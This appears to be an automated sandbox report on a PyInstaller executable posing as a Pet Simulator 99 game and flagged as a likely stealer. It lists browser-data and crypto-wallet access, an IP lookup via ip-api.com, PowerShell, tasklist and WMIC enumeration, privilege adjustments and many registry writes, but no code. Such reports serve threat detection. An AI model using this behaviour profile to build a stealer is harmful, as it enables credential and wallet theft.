Malware Analysis Report

2025-05-05 21:18

Sample ID 240510-tr6vcshf36
Target [πŸšͺBACKROOMS] Pet Simulator 99!.exe
SHA256 b984e378befd8a00559bb9f7d58015ea781615f47172a1c0ccfd4fad3cb2b9a2
Tags
pyinstaller execution spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

b984e378befd8a00559bb9f7d58015ea781615f47172a1c0ccfd4fad3cb2b9a2

Threat Level: Likely malicious

The file [πŸšͺBACKROOMS] Pet Simulator 99!.exe was found to be: Likely malicious.

Malicious Activity Summary

pyinstaller execution spyware stealer

Command and Scripting Interpreter: PowerShell

Reads user/profile data of web browsers

Loads dropped DLL

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Unsigned PE

Detects Pyinstaller

Suspicious use of SetWindowsHookEx

Detects videocard installed

Suspicious use of AdjustPrivilegeToken

Gathers system information

Enumerates processes with tasklist

Suspicious use of FindShellTrayWindow

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-10 16:18

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-10 16:18

Reported

2024-05-10 16:29

Platform

win11-20240508-en

Max time kernel

250s

Max time network

251s

Command Line

"C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[πŸšͺBACKROOMS] Pet Simulator 99!.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133598319601591199" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\MRUListEx = ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3} C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "5" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\NodeSlot = "2" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "4294967295" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "2" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\NodeSlot = "7" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Generic" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe100000008f67f23258a1da018b03b39a5ba1da015d19dfd2f6a2da0114000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\SniffedFolderType = "Generic" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\NodeSlot = "6" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
